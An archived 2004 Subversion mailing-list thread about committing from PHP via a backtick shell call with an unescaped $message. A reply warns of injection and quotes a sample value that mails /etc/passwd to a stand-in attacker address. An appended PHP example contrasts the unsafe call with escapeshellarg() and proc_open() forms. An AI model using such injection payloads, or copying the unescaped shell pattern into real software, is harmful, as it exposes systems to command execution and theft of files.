RE: PHP hack under way

From: Bryan Simmons <bznutz_is_king_at_yahoo.com>
Date: 2004-02-12 15:32:05 CET

Is it complete?
My point thus far has been that I need my hack to work yesterday.
I would much rather use php bindings, but I'm time limited.
My design time has to be O(1).

Regards,

Bryan Simmons

-----Original Message-----
From: Rick Gigger [mailto:rick@alpinenetworking.com]
Sent: Wednesday, February 11, 2004 5:56 PM
To: Bryan Simmons
Cc: 'Brian W. Fitzpatrick'; users@subversion.tigris.org
Subject: Re: PHP hack under way

Isn't this a project to create real php bindings?

http://spe.tigris.org/

Bryan Simmons wrote:

> But $message is created by the script, with no user input. It comes
> from portal variables such as the current user and location in the
> portal. Also, the apache2 server is running as the svn user who can
> only access things in ~/ and /usr/local/apache2/htdocs.
>
> Regards,
>
> Bryan Simmons
>
> -----Original Message-----
> From: Brian W. Fitzpatrick [mailto:fitz@red-bean.com]
> Sent: Wednesday, February 11, 2004 4:56 PM
> To: Simmons, Bryan
> Cc: users@subversion.tigris.org
> Subject: Re: PHP hack under way
>
> On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
>
>> Ok, so I went ahead and took the easiest approach I could: svn client
>> commands in php. The kinks have not all been worked out for my php
>> portal but I did find a way to successfully
>> push revisions to subversion through php.
>>
>> I use the backtick operator. Yep, it's that simple.
>>
>> $response = `svn commit -m \"$message\"`;
>>
>> I have found that the $response is dead-on accurate in this case
>> despite warnings that the command line response may be garbled into
>> binary.
>>
>> Here's a question: will svn add && svn commit work?
>
> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this. What if message is
> actually equal to
>
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
>
> or something worse.
>
> Just a little something to think about.
>
> -Fitz

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Thu Feb 12 15:32:24 2004
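
Added example, not code from the thread: the backtick-style command from the quoted message next to two forms that keep `$message` a single argument. `printf` stands in for `svn commit -m` so it runs without a repository, the function names are hypothetical, and the input string is constructed with a harmless marker command in place of the one Fitz wrote.

```php
<?php
// Added example; not code from the thread. `printf '%s\n'` stands in
// for `svn commit -m`, so no svn binary or working copy is needed.

// Shape used in the thread: $message is interpolated between double
// quotes that the shell interprets. A double quote inside $message
// closes the argument early and the rest is parsed as shell syntax.
function commit_unsafe(string $message): string
{
    return (string) shell_exec("printf '%s\\n' \"$message\"");
}

// escapeshellarg() wraps the value in single quotes and escapes any
// embedded single quote, so the shell passes it on as one argument.
function commit_quoted(string $message): string
{
    return (string) shell_exec("printf '%s\\n' " . escapeshellarg($message));
}

// No shell involved: with an array command (PHP 7.4+), proc_open()
// executes the program directly and each element is one argv entry.
function commit_noshell(string $message): string
{
    $spec = [1 => ['pipe', 'w']];            // capture stdout only
    $proc = proc_open(['printf', '%s\n', $message], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return (string) $out;
}

// Constructed input: same quoting shape as the string in Fitz's reply,
// with a harmless marker command.
$message = 'foo" ; echo INJECTED ; echo "';

echo "unsafe:\n", commit_unsafe($message);   // second command runs
echo "quoted:\n", commit_quoted($message);   // message printed verbatim
echo "noshell:\n", commit_noshell($message); // message printed verbatim
```

Only the first call lets the text after the embedded quote run as a separate command; the other two hand the whole string to the program as the log message.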

This is an archived mail posted to the Subversion Users mailing list.
